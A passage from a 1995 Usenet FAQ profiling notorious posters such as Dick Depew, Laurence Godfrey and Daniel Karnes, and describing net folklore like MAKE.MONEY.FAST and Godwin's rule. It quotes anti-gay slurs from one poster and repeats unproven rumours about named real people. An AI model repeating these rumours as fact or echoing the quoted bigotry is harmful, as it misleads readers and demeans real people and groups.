View all headers Path: cs.ruu.nl!sun4nl!EU.net!news.kreonet.re.kr!insosf1.infonet.net!solaris.cc.vt.edu!news.mathworks.com!news.duke.edu!godot.cc.duq.edu!newsfeed.pitt.edu!gatech!bloom-beacon.mit.edu!senator-bedfellow.mit.edu!faqserv From: David DeLaney <dbd@panacea.phys.utk.edu> Newsgroups: alt.folklore.computers,alt.usenet.kooks,alt.answers,news.answers Subject: Net.Legends.FAQ (Noticeable Phenomena Of UseNet) Part 2/4 Supersedes: <net-legends-faq/part2_785948886@rtfm.mit.edu> Followup-To: poster Date: 8 Feb 1995 20:25:19 GMT Organization: Brown Ajah, r.a.sf.w.r-j Division Lines: 1154 Approved: news-answers-request@MIT.EDU Expires: 6 May 1995 20:19:01 GMT Message-ID: <net-legends-faq/part2_792274741@rtfm.mit.edu> References: <net-legends-faq/part1_792274741@rtfm.mit.edu> Reply-To: dbd@panacea.phys.utk.edu NNTP-Posting-Host: bloom-picayune.mit.edu Summary: This FAQ gives information on some of the more noticeable or notable people, places, and/or things occuring on UseNet. Not to be taken internally. X-Last-Updated: 1994/09/15 Originator: faqserv@bloom-picayune.MIT.EDU Xref: cs.ruu.nl alt.folklore.computers:88751 alt.usenet.kooks:14075 alt.answers:6789 news.answers:36917 View main headers Dick Depew (ARMM! ARMM!! ARMM!!!): Long-lost twin brother of the intelligent and articulate Ray Depew, who's not paying me one cent for those adjectives (AFU Official Ex-Executioner: *no* smileys!). Showed up first in the sci.* hierarchy, later became most common on news.* . Interestingly enough, as near as I can tell, the original set of cancels that he did affected exactly *two* posts - both of which had dared to come from anon.penet.fi in the sci.* hierarchy... much to his surprise, something of a furor arose over these, which was prolonged unmercifully by his defense of his actions. Notable chiefly for his long and vocal insistence that his plan (ARMM) for moderation by forge-cancellation of people's posts (RetroModeration, or RM), possibly without their permission, is a valid, necessary, and logical addition to UseNet. Version one malfunctioned when tested (3/30/93), causing a massive newspost/cancel loop (it was cancelling its own cancels, as near as I can make out) which caused general hysterical laughter from those who knew what was going on, as well as the usual predictions of the imminent death of UseNet (q.v.). Briefly espoused a "tit-for-two-tats" version. As it turns out, the net is actually threatened in various manners by several different things (not the least of which is its own ever-increasing growth), but anonymous postings and/or the accountability thereof generally are not among the subjects people post "Death of Usenet predicted" (q.v.) messages about these days... Joel Furr (q.v.) newgrouped alt.fan.dick-depew (which is *not* retromoderated by Dick, despite frequent claims by him to the contrary...). Dick was helpful in cancelling, for instance, the rec.arts.sf.starwars 16+Megabyte UseNet "burp", which tied up traffic for half a day in 12/93, and more recently the mustang.com repost spew on news.groups and alt.config. He has also offered for public consumption his spam-auto-cancel scripts (talk to him for details) since the advent of Canter & Siegel... Also notable for his theory that off-charter postings are uncivil and therefore deserve to be "moderated" out of existence. Uses the term "supersedes" instead of "cancels" to refer to his scheme, generally. Has had trouble in the past making his plans conform to RFCs -822 and -1036. "Now he lives off his new-found fame, kibozing the Net for `ARMM' and revelling in immortality by monumental error." More info is available in the Anonymity On The Internet FAQ (which, oddly enough, is by a pre-legendary-status L. Detweiler (q.v.)...). Also the proponent of "Newsgroup Democracy", an interesting concept he regards as semi-integral to RM (but which others, sadly, regard as a separate item - if ND *were* inseparable from RM, objections to the latter would be far fewer). Had a medium-size heart attack in 1/94, but (against doctor's orders to not do anything stressful) returned to net.debate soon after; it seems not to have had adverse effects though, thankfully. Newgrouped alt.retromod in 3/94 after a perfunctory proposal (not involving ND) on alt.config and has taken to mostly posting (and "admonishing" and "rejecting") there. Claims to currently be figuring out a revolutionary new Message-Id: scheme for HappyNet... and is gleefully awaiting the return of Canter & Siegel to UseNet... Contrib. post: >P.S. are you considering taking on the task of ARMM archivist? No, Dick, I'm not. I'm actually still of the opinion that you're a dangerous loon who should be locked up in a small steel box and put in a room with Tim Pierce. P.S. ARMM! -- Posts from red@redpoll.mrfs.oh.us (Richard E. Depew). John Palmer (Another FORGERY!!!; I'm outa here for good and this group is toast): Has his own alt.fan. group. And his own FAQ (which nobody can apparently locate at the moment). Associated off and on with Rabbit.Net (currently up); names his computers after the Thundercats. Perenially in trouble with Michigan net-routing people for forging map address entries for tygra. Has his own stable of virtual lawyers, constantly on the go (which can be seen only by the pure of heart), at least one of whom is named Mr. Stechschulte; has his own special epithet ("asshole") [note: he uses it about others, not vice-versa - just to be clear here...]. Is the victim of many, many forged postings doing nasty things with rmgroups and newgroups, all of which are shrouded in mysterious circumstances, and all of which were confirmed at first by other forged postings purporting to be from him. He's never (curiously) taken advantage of PGP to verify which of these postings are actually from him... His last widely-known exploit resulted in the twilight existence of alt.tv.tiny-toon.sex, against determined rmgrouping by other admins (who were chiefly incensed because John's "discussion" seemed to have taken place on an other-dimensional net)... Currently has reappeared, claiming never to have left or been "no longer employed by" RabbitNet after all, and started up an automatic repeated rmgrouping of alt.fan.john-palmer, which in consequence has gotten a lot *busier* (maybe he should be newgrouping it instead?) Gave up on that after a while. Is now apparently running an anonymous-remailer service off tygra which Vitaca Milut (q.v.), among others, is using. Ask on a.f.j-p about the "Mortimer Bomb"... Newgroups for about six rabbit.*- hierarchy groups, including rabbit.config and rabbit.q-and-a, showed up in 9/94; questions about RabbitNet probably belong on the latter... Posts from uuhare@rabbit.net and @tygra.com, among (many) others. Bruce Becker: Sysadmin reportedly somewhere in Canada who takes many rmgroups for alt.* that reach his site, forges them (under assumed names) into newgroups for the same groups, and sends them out again, ensuring the effective immortality of anything in the alt.* hierarchy. Widely cordially disliked, and partly responsible (with his imitators) for many of the unused newsgroups that infest alt.* to this day. His newgroups are recognizable from the invariable ...!feline!halt!... in their path somewhere. Reported to have been responsible for the whole series of "Copyright violations" description lines in the alt.binaries.pictures.* groups... Was absent between October 1993 and March 1994; no such forged newgroups were reported during that time, except for one in 1/94 (for alt.binaries.games.vga-planets) which was rather more clueless than usual Becker forges, and was probably from an imitator... GTS.ORG is a site registered to Bruce Becker in Toronto, along with several others according to rs.internic.net, and visitors to the city have said that there is a Bruce Becker in the phone book there... is this the real Bruce? Who knows? Posts, occasionally, a list of the alt newsgroups he considers to be non-bogus from news@gts.org to alt.config/alt.answers/news.groups/ news.admin.misc/"alt.newgroup". May also be bdb@gts.org; if anybody knows a consistent email address for Bruce, let us know... Laurence Godfrey: Found on soc.culture.canada and soc.culture.british. Contrib. post: For the uniniated, Laurence Godfrey is a british scientist who worked in Canada until he quit after a dispute with his boss (he is currently suing his former employers). Since that time, Godfrey has taken to posting on soc.culture.canada with insulting comments about Canada and canadians in general. Needless to say, he has generated a lot of flames. A few months back, several people posted comments to the effect that he was fired from his canadian job. "Libel!" cried Godfrey! Surprisingly, as of about a week ago (12/93), Godfrey claimed to have won out of court settlements from the academic institutions that these people attended. In the last few days, the thread has spiralled out of control - people doubting his claim (particularly the aspect of suing people in Canada from a British court) have called him a liar. His response to these people has been along the lines of: you'd better be careful what you say or: I am taking the necessary steps to deal with this person - basically implying that he will take legal action. A popular reply to this has been that Godfrey is purposely attracting "libelous" flames in order to make a quick buck. -- He vehemently loathes Canada and anything Canadian. Or German. But he's not racist (he married a Thai [note: Filipino, actually]); he came to hate most foreigners after a great deal of thought. He also loves suing, and is perpetually threatening to sue for libel over the net. Look for his posts in soc.culture.british (or don't), and there was even at least one issue of the Godfrey Gazette containing some of his more xenophobic comments. >this might sound like a rather minor net.loon... Well, apart from his disturbing ability to capitalize correctly (they're the most dangerous ones), he does have all the correct attributes. -- John Palmer (q.v.) has a stable of virtual lawyers, but this appears to be looniness of an entirely different order... Has been fairly quiet about the legal threats since 12/93; claims to have served someone with a High Writ just before Xmas. But wait - Contrib. Newsflash: From "RISKS DIGEST 16.06" (usenet group comp.risks): > In the first case of its kind in the UK, Canadian academic Dr Laurence > Godfrey [^^^^^^^^ oh boy, RISKS DIGEST is about to get sued for libel!!] > issued a libel writ in London against another academic based in Geneva > claiming he was defamed by a bulletin board message posted on the Usenet > system. If the claim succeeds, hosts and users could soon be contemplating > sizeble pay-outs. I'm not wrong, "Phil Hallam-Baker" is the "academic based in Geneva" that Godfrey has the libel writ against. Personally, I regard Hallam-Baker as one of the "single issue" ax-grinders that make Usenet such an inter- esting place. He seems to regard DEC (the corporation) and VMS (the operating system) as some sort of holy things. -- Posts from s0lg@exnet.com (L Godfrey). David Sternlight: Contrib. post: I second. David is one of the insidious ones, because he can spell and write. But he's terribly dishonest (or a GREAT troller). Every now and then, someone will post something saying "I don't always agree with David [who does?], but his posts always seem to make sense". I suspect they either don't understand the subject matter, they don't like flames (get off usenet NOW), or they're just loony lurkers. -- David would need to be added based in his lifetime of work, not a single rant (although I could probably dig one up if I needed). This contrasts with the Dan Gannon ilk whose every sentence screams "I'M A LOON!". David has been kind enough to keep from proliferating too far across the net. He tends to stick to the crypto groups and has what I would call a sick obsession with other people using pgp (he doesn't like it). -- There's David Sternlight, who seems to get his jollies by presenting his own agenda while ripping up or dismissing out of hand everyone _else's_ positions on topics in comp.org.eff.talk, then getting bent out of shape when people start slapping him down, so he declares that he's making his last post to this group, so any snappy comebacks are pointless because he won't see them -- and then begins posting again within a week. I think he's up to his third or fourth "I'm leaving this newsgroup forever" message now, and there was another posting from him this morning in comp.org.eff.talk. -- Clearly your counting abilities are not very well; you have lost count ;-). -- [He is widely believed on those groups to be working for the government, and trying to encourage use of the Clipper encryption chip, and to discourage PGP (because the US govt. can't break it); he is (or was, in 1989) a member of the gov't's Council on Foreign Relations...] Pat Townson (UseNet is a cesspool, a dungheap): Moderator of comp.dcom.telecom, alias the Telecom Mailing List/Digest (gatewayed). Known mainly for his commentary added, seemingly at random, to the ends of posts - that is, up until John Higdon, and others, proposed another, unmoderated, telecom group, to be called comp.dcom.telecom.tech; got *way* over-worked-up on this issue. Had a personal vendetta against Higdon - accused him of owing him thousands of $, wrecking his net.livelihood, etc. The first vote failed; much of the blame for this was laid at Pat's feet for allowing only negative commentary (except for one special issue of the Digest [which {I disrecall} may actually have only appeared *after* the first vote]) to appear in the group and for sending out a special mailing, to the list, urging people to vote against the group's creation on rather specious grounds. Negative votes poured in from list people - but only *after* said mailing. The vote failed the 2/3-YES test (but not the >100 test). The allegations of irregularity finally moved tale (q.v.) to waive the normal six-month waiting period. The second vote was marked by even *more* of a flamewar (although not up to the standards of the soc.culture.tibet/ talk.politics.tibet flamewar which had just ended, and of less volume than the rec.food.veg "discussion") in news.groups, and passed resoundingly; shortly after, Pat made some final scathing comments in news.groups (including a threat to start a group sounding remarkably like this present FAQ) and cut off the gatewaying of the mailing list to UseNet. Has since restarted the Digest's feed (*possibly* motivated by Joel Furr's (q.v.) generous offer to take over the moderation of c.d.t); all has been relatively quiet since 12/93... Daniel J. Karnes (None of you guys have phased me even for a minute): In the same tradition as Fordyce/Kaldis/The Bard; seen periodically on a.p.h, attempting to ridicule arguments against bigotry and usually winding up showing how little he knows on the subject. His sig read at one point "Infinitely inconclusive", which many people think applies to his usual "arguments" quite well. Has missed, somehow, learning that quantity of posting does not correlate with quality thereof. One of his aliases may (or may not) be "Artimus Page", who posts radical-right anti-homosexual tracts from time to time from a (bogus) address at Yale, claims to have a "cure" for homosexuality and a clinic at which it's implemented, and who seems to be present only when Dan is on-net... many people argue against this on the grounds that Dan couldn't keep from wisecracks long enough to post "Artimus Page"'s tracts (which isn't true, as Dan *can* write well when he bothers to make the effort - see below), and that "Artimus" never responded directly to people... Netcom knows about Dan, is watching to see if he oversteps himself, and has had at least one little chat with him about harassment of other netizens... Also seen on the other gay groups; gets shunned on soc.motss, and leaves quickly because of it. Apparently in it solely for the attention he gets from gay people, which makes one wonder severely... Has claimed outright to kiboze, apparently for his name and/or initials in various forms (which is why certain groups warn new people "don't say That Name again, please, or he'll show up and we'll all have to start up our killfiles again"); has also claimed to rarely call people names. Also seen frequently on ca.earthquakes, where he reportedly has something of a reputation as well. Has been laughed out of alt.flame at least once by the master flamers residing there; has been taken against by "Andrew Beckwith" (q.v.). Once (shortly after his first wife packed herself up in their brown Ford Taurus station wagon and left him) forged a post to news.announce.important asking that anybody who saw her get in touch with him; I suppose it *was* important to him... -- Contrib. post: Strikingly, no one that I've noticed has nominated Daniel J. Karnes as a net.butterfly (in the sense of "small thing one wishes were easily torn apart", perhaps). Maybe it's because he's been away. But he's back. Here's an extract from one of his recent posts, detailing his own assessments of his accomplishments last time around... >Actually, I "accomplished" quite a lot... Thus: >1) I got two hundred queers to go buy Bibles - and READ them. >2) I exposed the little "nice guy" facades that you guys put on >as the bullshit those of us with thinking minds know them to be. >3) I demonstrated the mental illness rampant in gay circles by >facilitating situations in which some really sick people dropped >their guards and demonstrated symptoms of their sickness publicly. >4) I exposed dozens of pedophilic gays for what they were by their >own admissions. >5) I thoroughly enjoyed myself. :) -- >>Artimus Page is always good for a laugh. He claims to have a `cure' >>for homosexuality. >Artimus Page is Dan Karnes under a very thin disguise... therefore he's >already got. This was widely claimed, but never decisively proved, as far as I know. The Path lines weren't even similar. I think Artimus deserves (?) separate mention, maybe in the Karnes section. Artimus definitely had a very different rant from the typical Karnes style; Artimus also never responded directly to anyone, as Karnes did all the time (albeit incredibly ineffectually). -- For what it's worth, every Artimus Page article that anyone bothered to track down was forged from the same out-of-the-way terminal server from which DJK has been seen to log in. -- Does Dan's entry include his rather, err, uh, unusual theories about earthquakes? He believes that earthquakes "like" to happen at 4:34 a.m. -- Danny has taken against this FAQ entry for some reason, and has threatened to borrow John Palmer's virtual lawyers, saying it's "slanderous" (hint: look up slander sometime) and defames his reputation, without actually ever giving any details to ye olde FAQ-writer on *why* he thinks this or what exactly he doesn't like, and going so far as to bother yoF-w's sysadmins and Department Heads and Deans (sheesh!) about it; his version of what it ought to read like is as follows (note that this by itself doesn't really tell one why he's widely known on UseNet, or most of the interesting details): -----begin Karnes----- The problem I have with my entry in this "FAQ" is that most of it is simply just not true, and the rest is nothing but propaganda from the net.queer element that reeks up certain parts of USENET. Reading this, I find that almost all of it conforms nicely to the "model" that net.queers try to paste on anyone that opposes them, but very little of it is based on fact. (quite typical of homosexuals) Please remove my entry from your FAQ - or allow it to be revised so that more TRUTH is presented. Like this: ------------------------------------ Daniel J. Karnes Or "djk" as he is known on computer systems around the world has been a part of the internet since it's early days. At first, he was confined to posting to "relative" newsgroups and sending private email through a numbered account in a large corporate machine. Djk found true freedom when he was one of the first users on one of the first commercial public access UNIX systems when the internet was opened up to non-governmental or academic users in the early 1990's. Djk works in the telecommunications industry as an engineer and manager, and possesses a rare blend of hardware and software skills that make him a technical power to be reckoned with. Early in his net.carreer, djk noticed a strong homosexual element present on the net, and being a member of a very large Traditional Values group, decided to watch them closely. It did not take much time for djk to become outraged by the activities of net.queers who seemed to think that the net was their own private playground. Djk began his very controversial postings to the gay groups as an effort to undermine the efforts of net.queers who were operating with gang-like organization against anyone who opposed them. Djk can stand firm against hundreds of opponents and his name strikes fear into the hearts of most homosexuals on the net. djk posts as djk@netcom.com and operates TASP.NET as a private access UNIX system from his home. ------------------------------------ There! Now THAT is more accurate! -djk -----end Karnes----- I might add that, contrary to his usual one-liner posting style, Dan *can* compose long rational pieces of prose like the above, given time, but apparently does not think it worth the effort to do so in almost all of his UseNet posts. A minifaq is also available with some interesting Dan posts and email, to/from myself and sysadmins. In 5/93, came in 13th in the "most evil net.personalities" vote on alt.evil . Posts as djk@(TASP.uucp.)netcom.com (email: djk@bandor.tasp.net) (Daniel J. Karnes). Not all of the net.legends are people - or even human. Therefore, viola (tm): 3.0 ------------------------------------ Stupid Net Tricks: Dave Rhodes and MAKE.MONEY.FAST: In every Paradise there is at least one fatal flaw. In every mail system, there is sooner or later a chain letter. UseNet, luckily, seems to have been adopted by only one such - but it pops up in more places and faster than kudzu, and is about as hard to kill completely. Actually, nobody currently knows much about Dave Rhodes (but see below) - except that he wrote the template for the first MAKE.MONEY.FAST pyramid scheme. His name and address have long since fallen off the top of any of the current copies... There is something of a miniFAQ available on this post. Advice to new netters panting to try it out and make $50,000 in an afternoon: I can tell you right now what you're gonna get - an extremely full emailbox, a ticked-off sysadmin (because your emailbox is full of letter bombs from irate UseNetters who snapped at seeing this cr*p in their newsgroups for the fifth time in two weeks, and because several thousand *un*snapped-as-yet UseNetters email her directly saying "Talk to this kid; it's illegal, a waste of time, and annoying), and a rapidly-vanishing UseNet access (wave bye-bye to it for a looooong time, if you're not lucky...). The letter itself says it's legal, you say? It's lying; it's known as a Ponzi or pyramid scheme, and is wire fraud for *sending* the letter, *and* postal fraud for receiving any of the money thru the U.S. Mail (can you say Federal Case, boys'n'girls?)... And you *have* to leave a trail directly to yourself, name and address - or else it *can't* work (hee hee)... Save yourself the grief: just say NO to Dave.Rhodes . Recently voted number one on list of people *every* UseNetter would like to see die an excruciatingly slow and painful death. If we're lucky, it does not get posted at all (for a day or two). Contrib. post: Dave Rhodes was a student at Columbia Union College in Takoma Park, MD. This is a Seventh Day Adventist college. The posting machine was !cucstud, aka Columbia Union College, Student. It passed news upstream to uunet. Cucstud was a 3B2, and there were two or three more. Note this predated the widespread usage of the pseudodomain of { }.UUCP, and I don't recall if the site was ever so named. Needless to say, Leroy Cain, the sysadm, was not amused. This posting was made in 1987-1988, sometime just after the infamous jj@portal one, and his incoming mail queue was impressive. I do not know if Leroy took the matter to the Dean of Students, but do know he posted an apology, and ensured that Dave would not be doing that again, at least at THAT site. As for why I had an account on cucstud, and knew Leroy, when my only connection was that I caught a bus to work in front of the place every morning; that's a different story........ -- I like what Dogbert had to say about chain letters: "Don't you think that for your first crime you shouldn't attach your name and address and mail it to several thousand strangers?" -- [Evidence has since turned up that the Dave Rhodes letter has been circulating, in snail-mail form, long before that fateful day in 1987 or 1988... ah well...] Alt.adjective.noun.verb.verb.verb: Alt.* ... is a sewer. Thanks to Bruce Becker (q.v.) and others like him, there are literally thousands of odd, little-known, poorly-propagated alt.* groups, many or most newgrouped as a whim of someone's. The canonical first on the list in this category (and the most widely (?) respected) is alt.swedish.chef.bork.bork.bork (newgrouped by Jeff Vogel, with Distribution: mudd and surprising-to-him results), for speaking in Mock Swedish and discussing chickee recipees. This spawned, thru the intervention of Shub-Internet (q.v.), alt.tv.barney.dinosaur.die.die.die, alt.wesley.crusher.die.die.die, sci.edward.teller.boom.boom.boom, alt.lawyers.sue.sue.sue, alt.minsky.meme.meme.meme, alt.music.enya.puke.puke.puke (and of course the infamous alt.music.enya.puke.puke.pukeSender:, missing <return> and all) as well as alt.ted.frank.troll.troll.troll ... all of which are effectively immortal. INN apparently now has a "kill-the-chefs" option which sends newsgroups of the form alt.foo.bar.baz.baz.baz to the bitbucket... Also infamous: .cabal, from approximately mid-'93, which broke news software far and wide (due to no-one having imagined anyone would create a newsgroup starting with "."...), and is *still* causing problems among some xrn users... The moral of the story? First: read *all* the newsgroup description lines. Then: read the alt.config FAQ. Only after *that* should you even *think* of discussing a new alt.* group (on alt.config, of course). "Can you take a moment to fill out this survey?"/"Do my homework for me, mister man?"/"Please email me, as I don't read this group": This sort of stuff recurs quite frequently, and is usually a result of low familiarity with UseNet. Try not to do it yourself. Surveys actually do have a place - but not the ones that seem to think they're doing you a favor by letting you contribute to their Important Research... "Please email me, as I *can't* read this group", on the other hand, is quite acceptable, as is "Please email me; I'll post a summary of the responses". Thinly-disguised attempts to get others to do your research paper or algebra homework are Right Out, thanks. "Will you icky queers kindly take your pictures/GIFs/discussions/proposals OUT of our nice shiny clean newsgroup!": Sigh. There will always be people who have *no* idea that ideas different from theirs exist - until they get to UseNet, where *anyone* can speak up at *any* time. Quote: "It's UseNet, get used to it." Prevalent on the erotica and sex groups; usually seen proposing that the group be *split* into sections - what a *marvelous* idea - why hasn't *anyone* ever thought of it before? Tend to leave quickly, under the dark cloud produced by the flames. Canonical recent example: stx1606 (q.v.). Clueless newbies: Everyone has been a newcomer at one point or another. Thus the term "newbie". It's not derogatory, and it's an easily-curable condition - for most people. The rest tend to become known as "clueless newbies". The only known treatment for such is repeated force-feeding of clues. Sometimes even this doesn't work... If someone *does* give you advice on the net, it *never* hurts to think about it for a second, nor does it ever hurt to think before following up to a post. Canonical example: the alt.christnet (q.v.) fiasco. And remember, all you newbie-flamers out there - you too once knew nothing whatsoever about this mysterious thing called UseNet. Death of UseNet/Internet predicted: People panic easily, it seems; any time there's a new development leading to expansion of the net, someone's sure to bring up its humble origins and the fact that it was never designed in the first place to be *anything* like what it's grown into today. This invariably leads to someone else predicting "imminent death of UseNet; film/GIFs/JPEGs/animated ASCII art/SIRDS/ Claymation/etc. at 11" (old news joke; Brad Templeton (q.v.) claims the original formulation of "Imminent death of the net predicted" - I don't know who first added "<medium> at 11"...). Basically, it's gonna take a *lot* of shit to break the net, as it is today (even Dick Depew (q.v.) didn't manage it (yet...)), although it can be staggered some, or slowed down for a bit... meanwhile, it keeps right on growing, and the next crisis is always Just Around the Corner (tm). The net *was*, after all, designed to keep functioning after an all-out nuclear war... and though some of the flamefests have approached this level, none have quite managed to destroy it yet. Anyway, "Imminent Death of the Net predicted, <medium> at 11" is a long-running net.joke, applicable to Internet as well as Usenet, and is in fact the unofficial Motto of news.admin.misc (where the net.crises are posted about and debated endlessly - until the next net.crisis shoves them aside). .sig viruses: First there were .sigs; next, the Warlord (q.v.); then came .sig viruses. The simplest (and probably first) was "Hi, I'm a .sig virus; copy me into yours and join the fun!". This, rather predictably, mutated into dozens of non-compatible versions; most .sigs can only hold one or so (Kibo's is, as usual, an exception; a 1000-plus-line .sig has room for *everything*!). A particularly strange turn was taken on a.f.u in late 1993, when Vicki Robinson, relative newbie, innocently proclaimed "But I'm not in anyone's .sig". A.f.u being what it is, this appeared in someone else's .sig almost immediately, (Jason R. Heimbaugh claims this distinction, and is keeping both the .sig collection and the FAQ) and quickly spread to cover nearly the entire a.f.u community of posters; it has been sighted as far away as news.* . There is a Vicki Robinson sig-virus FAQ; refer to it for more details on chronology, varieties (this .sig virus mutates MUCH faster than normal), etc. Vicki's own .sig now contains mentions of her .sig virus in other people's .sigs (a meta-virus)... "welcome to afu. Here's your accordion" sums it up best, I guess. A Vicki virus in your .sig is not *required* for a.f.u posters (indeed, Joel Furr (q.v.) has denounced the practice, saying essentially "get a life"... and has ended up in Vicki's .sig, and others, as a result)... but viruses *are* contagious. Has somewhat revived, in multiple varieties, not all of which are Vicki anymore, in late summer '94. Alt.religion.kibology: Possibly one of the strangest places on Usenet. Home to the worship of and/or scorn for Kibo (q.v.); impossible to crosspost inappropriately to, much like misc.misc . Home also to a constantly-changing cast of "regular" Kibologists, currently including several people already mentioned in this FAQ (Kibo, by definition, plus John_-_Winston, Ludwig Plutonium, and Andrew Bulhak, and everyone mentioned in the xibo entry), as well as such luminaries as Craig Dickson, Lewis (YDNCTFL YWSRCFAOTW) McCarthy (not to be confused with Lewis Stiller), Rose Marie Holt, brent jackson, and Jay Paul Chawla, plus a couple anti-kibologists (Jason V Robertson is filling this role at the moment, with R Bryner being an anti-k 'bot). Filled with trolls, beabling, "You misspelled Ann Rand", odd followup-to lines, posts from Kibo, and a proselytary attitude; inadvertent arch-enemy newsgroup of rec.org.mensa . If you see it in the headers while reading another newsgroup, you may want to take a deep breath before pushing 'f'. Stick around long enough here and you'll be crossposted almost everywhere else on UseNet... which leads us neatly into Crossposted to *.test: A variation on "crossposted to alt.hell and back"; see Gannon, Argic, etc. A news.admin.misc post suggested that this practice (which gives unsuspecting followers-up a deluge of autoreplies from the daemons scanning the *.test groups worldwide) originated with Carasso (q.v.) in the late 80s; further data I've gathered indicates, however, that it well predates him, and that he simply widely popularized and practiced it... Moral: *Always* check your Newsgroups: and Followup-to: lines... And the sequel, "Posted separately to every newsgroup you can find": No, you're not the first person to think of it. Unfortunately, you won't be the last, either. As the net grows, and the number of new users grows, however, each incidence of this is a little worse than the last; at the moment we have in net.memory Skinny Dip Thigh Cream (posted by someone who set his email-forward to the [widely known] address of one of the developers of Mosaic, but got kicked off his account *very* fast anyway because he didn't have the access to set his site's postmaster@ address' forwarding too), Laurence Canter and his law firm^H^H^H^H^H^H^H^Hwife Siegel [Green Cards and Spam! I do not like it, Sam I Am!] (who have been kicked off *four* separate services for mass postings of a misleading "Green Card" ad) and Clarence Thomas IV, who mass-posted a two-page note about the end of the world ("JESUS IS COMING SOON") soon after the California quake from a Seventh-Day Adventist college somewhere. Joel Furr (q.v.), incidentally, has released a Canter & Siegel T-shirt, and in return has been threatened with various lawsuits by the distaff portion of that lovely pair... "Cross-posted to 2000 different newsgroups" has also been thought of; this will quite probably break people's newsreaders all over the place due to line length considerations. Either of these is about the only thing that's not actually illegal that you can easily do which will piss off your admins *and* the net worse than posting Make.Money.Fast (q.v.); don't even think about going down in net.history like this, kids. Can you say "25,000 pieces of email in your mailbx"? Can you say "Kicked off your account faster than you can spell an12070@anon.penet.fi"? I knew you could... Hitler, Nazis, nazis, and net.cops: Warning: now that this FAQ has mentioned Hitler and Nazis, UseNet Rule #4 (also known as Godwin's Rule, after Mike Godwin of the EFF, sci.crypt, and comp.org.eff.talk, a sometime foe of David Sternlight (q.v.) [even though it was apparently in use, by Richard Sexton {q.v.} among others, before Mike's 1988 (?) net.advent; the "Godwin's" part seems to stem from "Rich Rosen's Rules of Net.Debate, which I don't have a copy of]) says it will be coming to an irrelevant and off-topic end soon. Just as there will always be newbies ("It's *always* September, *somewhere* on the net" - response to a 1993 wave of delphi.com postings on a.f.u), there will always be people who see the net and are repulsed because there's stuff there they don't want to see - so they set out to make sure noone else can, either. They invariably fail, because there are no net.cops to enforce any such rules on UseNet; in the course of the heated flamewar that usually follows, things escalate until either Hitler or Nazis (or both) put in an appearance, at which point the thread has officially lost all relevance. People scream at each other a bit more, then give up and go home. Bleah. "Keep your brains up top; don't be a net.cop." This has mutated, in true UseNet fashion, to encompass *any* continuing thread; if you mention Hitler or Nazis out of the blue, the thread is sure to die irrelevantly soon (and, incidentally, you've lost the argument, whatever it was)... and every continuing thread on UseNet *must* contain such a reference sooner or later. Invoking Rule #4 deliberately in hopes of ending a thread, however, is doomed to failure (Quirk's Exception)... UseNet Rules #n: No firm info at the present time is available on just what the other UseNet Rules #n are. However, at a guess, they include: -- Rule #nonumber: There are no hard-and-fast Rules on UseNet, only Guidelines, which are more or less strictly enforced (and differ) from group to group; this is why it's generally wise to read any group for a bit before ever posting to it. Rule #0: *There* *is* *no* *C*b*l*. There *is*, however, a net-wide conspiracy designed solely to lead Dave Hayes (q.v.) to believe that there is a C*b*l. Corollary: *There* *are* *no* *pods*. Rule #9: It's *always* September, *somewhere* on the Net. Dave Fischer's Extension: 1993 was The Year September Never Ended [so far, there doesn't seem to be much evidence he's wrong...] Rule #17: Go not to UseNet for counsel, for they will say both `No' and `Yes' and `Try another newsgroup'. Rule #2 (John Gilmore): "The Net interprets censorship as damage and routes around it." Rule #108 (from the soc.motss FAQ): "What will happen to me if I read soc.motss?" "In general, nothing. (You may be informed or infuriated, of course; but that's a standard Usenet hazard.)" Rule #666: Old alt groups never die. They don't fade away nicely, either. Rule #7-B: There is no topic so thoroughly covered that noone will ever bring it up again. Rule #90120: Applying your standards to someone else's post *will* result in a flamewar. Rule #1: Spellling and grammer counts. So do grace, wit, and a sense of humor (the latter two are different), as well as a willingness to meet odd people, but these are lesser considerations. Rule #x^2: FAQs are asked frequently. Get used to them. Rule #29: no rational discourse can happen in a thread cross-posted to more than two newsgroups. rule #6 (Eddie Saxe): don't post to misc.test unless you understand the consequences. Rule #547 (Arne Adolfsen): When people know they're wrong they resort to ad hominems. Rule #37 (Faisal Nameer Jawdat): Read the thread from the beginning, or else. Rule #5 (Reimer's Reason): Nobody ever ignores what they should ignore on Usenet. Rule $19.99 (Brad `Squid' Shapcott): The Internet *isn't* *free*. It just has an economy that makes no sense to capitalism. Rule #3 ("Why 3?" "Because we felt like it"): For every opinion there is at least one equally loud and opposing opinion; sometimes stated as: Rule #27 (Gary Lewandowski): . `Rap is not music' (and other Permanent Floating Flamewars): Contrib. post: In the list of non-human net.legends, I think the `Rap is not music' meta-thread deserves a mention. This turns up every month or two in some music group, and is distinguished by being even more predictable than the average recurring net.thread. It's become a crowd participation event to chant along with the newbie following the script until he gets to the point where he (never seen a woman do it) volunteers to write a rap 'cos its so easy and disapears in a puff of embarassment. -- [alt.folklore.computers] ( 3 or 4 months, and still kicking! >Hi, Mike [Dahmus]!). >The "Furrymuck is for lameoid perverts" thread that Joel Furr keeps >firing back up on alt.fan.furry... >And let's not forget. -- Foob's Law states that the quickest way to completely derail any netnews discussion is to bring up gun control, and so I guess we're on our way to Outer Space now. -- Note that almost every newsgroup will have a Flamewar that Will Not Die (or two, or six) lurking somewhere in the background - but that these flamewars are usually pretty well confined to the one newsgroup simply through specialization, so I'm not gonna even try to include most of them here... however, there are several that pop up almost at will *anywhere* in UseNet, among which are the abortion flamewars, the homosexuality flamewars, the "My computer's better than yours" flamewars, the freedom-of-speech/UseNet- is-international flamewar, the Permanent Floating Flamewar that followed Serdar Argic wherever he oozed, the drug wars (for various drugs), the male/ female circumcision wars, and the Christianity-spreading-people vs. "enlightened intellectuals" flamewar(s)... there's something about many of these subjects that seems to attract the worst in people (that's partly why this FAQ seems to concentrate somewhat on anti-gay posters, for instance - there's so *many* of them that have this little "hot button" that there's more kooks amongst them...). Scan down the subjects in talk.* for a more complete listing, and note that Emily Postnews has a FAQ on the predictable "I want my groooop!" script for alt.config ... "Oooo, *he's* Famous! What's his email address???": There are many people on the net who are Famous in Real Life tm; however, usually the requirements of being Famous preclude their spending all their time on the net corresponding by email with Fans. Some have newsgroups where they hang out (Douglas Adams and Mike Jittlov have their own alt.fan groups, for instance, as do Dave Barry and Terry Pratchett, and they show up there or lurk with varying degrees of consistency); others are on an online service or just lurk in certain places. Generally, though, you'll do better writing to their editor or publisher or agent if you really really want an autograph or a piece of their clothing... William Gibson (of Neuromancer fame) is *not* on the net (he still reportedly uses a manual typewriter), so don't ask. Asking "Gee, how can I get [famous 